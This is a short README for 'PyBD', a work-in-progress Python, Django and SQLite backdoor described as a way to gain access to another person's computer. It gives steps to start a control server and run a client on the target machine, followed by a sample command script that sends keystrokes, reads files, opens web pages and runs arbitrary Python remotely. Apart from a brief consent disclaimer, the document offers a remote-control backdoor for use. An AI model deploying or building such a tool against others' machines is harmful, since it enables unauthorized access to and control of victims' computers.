PyBD WIP DO IT ON YOUR OWN RISK AND WITH CONSENT We are not responsible for any damage you do Backdoor made with python, django, sqlite (WIP) What is a backdoor? Basically you can gain access to another persons computer. Usage: First install all the libraries you need for this pip install -r requirments.txt Than, you need to start the server cd server python manage.py runserver Run the main.py on the target machine cd client python main.py Code Example keyboard:" `ctrl + n` www.youtube.com `enter` "; delay(5) keyboard:" alt + f4 "; cd .. read("test.txt", "test1.txt") volume(100) web("www.google.com",5) python:" print("hello world") "; More info here